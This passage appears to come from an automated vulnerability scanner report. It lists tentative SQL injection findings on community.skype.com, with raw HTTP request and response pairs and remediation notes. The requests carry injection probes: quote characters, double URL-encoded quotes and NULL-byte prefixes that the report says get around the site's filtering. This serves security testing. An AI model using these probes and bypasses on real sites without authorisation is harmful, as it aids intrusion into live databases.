<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/help/faqpage/faq-category-id/ideas HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00''

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:41 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 47893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Help - Skype
...[SNIP]...

1.25. http://community.skype.com/t5/help/faqpage/faq-category-id/ideas [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/help/faqpage/faq-category-id/ideas

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/help/faqpage/faq-category-id/ideas HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:43:33 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/help/faqpage/faq-category-id/ideas HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:34 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 47913

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Help - Skype
...[SNIP]...

1.26. http://community.skype.com/t5/help/faqpage/faq-category-id/ideas [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/help/faqpage/faq-category-id/ideas

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/help/faqpage/faq-category-id/ideas?1%2527=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:43:31 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/help/faqpage/faq-category-id/ideas?1%2527%2527=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:31 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 48002

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Help - Skype
...[SNIP]...

1.27. http://community.skype.com/t5/help/faqpage/faq-category-id/kudos [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/help/faqpage/faq-category-id/kudos

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /t5/help/faqpage/faq-category-id/kudos HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:43:35 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/help/faqpage/faq-category-id/kudos HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00''

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:37 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 24771

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Help - Skype
...[SNIP]...

1.28. http://community.skype.com/t5/help/faqpage/faq-category-id/participation [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/help/faqpage/faq-category-id/participation

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/help/faqpage/faq-category-id/participation%2527 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:43:49 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/help/faqpage/faq-category-id/participation%2527%2527 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:51 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 44665

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Help - Skype
...[SNIP]...

1.29. http://community.skype.com/t5/help/faqpage/faq-category-id/qa [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/help/faqpage/faq-category-id/qa

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/help/faqpage/faq-category-id/qa HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:43:34 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/help/faqpage/faq-category-id/qa HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527%2527

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:34 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 47596

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Help - Skype
...[SNIP]...

1.30. http://community.skype.com/t5/help/faqpage/faq-category-id/qa [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/help/faqpage/faq-category-id/qa

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /t5/help/faqpage/faq-category-id/qa?1'=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:43:30 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/help/faqpage/faq-category-id/qa?1''=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:30 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 47701

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Help - Skype
...[SNIP]...

1.31. http://community.skype.com/t5/help/faqpage/faq-category-id/video [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/help/faqpage/faq-category-id/video

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/help/faqpage/faq-category-id/video%2527 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:43:45 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/help/faqpage/faq-category-id/video%2527%2527 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:46 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 44611

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Help - Skype
...[SNIP]...

1.32. http://community.skype.com/t5/iPad/Trouble-calling-nonskype-phones-from-iPad-and-iPhone/m-p/134130 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/iPad/Trouble-calling-nonskype-phones-from-iPad-and-iPhone/m-p/134130

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/iPad%2527/Trouble-calling-nonskype-phones-from-iPad-and-iPhone/m-p/134130 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:49 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 63890

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
ine-alert",
"BASE_AJAX_LOADER_OVERLAY" : "lia-ajax-loader-overlay",
"BASE_AJAX_LOADER_CONTENT_OVERLAY" : "lia-ajax-loader-content-overlay",
"BASE_SPOILER_LINK" : "lia-spoiler-link",
"BASE_FORM_ERROR_TEXT" : "lia-form-error-text",
"BASE_AJAX_LOADER_FEEDBACK" : "lia-ajax-loader-feedback",
"BASE_FEEDBACK_SCROLL_TO" : "lia-feedback-scroll-to",
"BASE_TABS_STANDARD" : "lia-tabs-standard",
"BASE
...[SNIP]...

Request 2

GET /t5/iPad%2527%2527/Trouble-calling-nonskype-phones-from-iPad-and-iPhone/m-p/134130 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:43:50 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

1.33. http://community.skype.com/t5/iPad/Trouble-calling-nonskype-phones-from-iPad-and-iPhone/m-p/134130 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/iPad/Trouble-calling-nonskype-phones-from-iPad-and-iPhone/m-p/134130

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/iPad/Trouble-calling-nonskype-phones-from-iPad-and-iPhone%2527/m-p/134130 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:54 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 63863

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
ine-alert",
"BASE_AJAX_LOADER_OVERLAY" : "lia-ajax-loader-overlay",
"BASE_AJAX_LOADER_CONTENT_OVERLAY" : "lia-ajax-loader-content-overlay",
"BASE_SPOILER_LINK" : "lia-spoiler-link",
"BASE_FORM_ERROR_TEXT" : "lia-form-error-text",
"BASE_AJAX_LOADER_FEEDBACK" : "lia-ajax-loader-feedback",
"BASE_FEEDBACK_SCROLL_TO" : "lia-feedback-scroll-to",
"BASE_TABS_STANDARD" : "lia-tabs-standard",
"BASE
...[SNIP]...

Request 2

GET /t5/iPad/Trouble-calling-nonskype-phones-from-iPad-and-iPhone%2527%2527/m-p/134130 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:43:54 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

1.34. http://community.skype.com/t5/iPhone/A-plan-for-calling-FROM-europe-to-USA/m-p/133998 [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/iPhone/A-plan-for-calling-FROM-europe-to-USA/m-p/133998

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /t5/iPhone/A-plan-for-calling-FROM-europe-to-USA/m-p/133998 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:43:45 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/iPhone/A-plan-for-calling-FROM-europe-to-USA/m-p/133998 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:45 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 63086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...

1.35. http://community.skype.com/t5/iPhone/bd-p/iPhone [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/iPhone/bd-p/iPhone

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /t5/iPhone/bd-p/iPhone?1'=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:43:41 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/iPhone/bd-p/iPhone?1''=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:41 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 193713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...

1.36. http://community.skype.com/t5/notifications/notifymoderatorpage/message-uid/25246 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/notifications/notifymoderatorpage/message-uid/25246

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /t5/notifications/notifymoderatorpage/message-uid/25246?1%00'=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

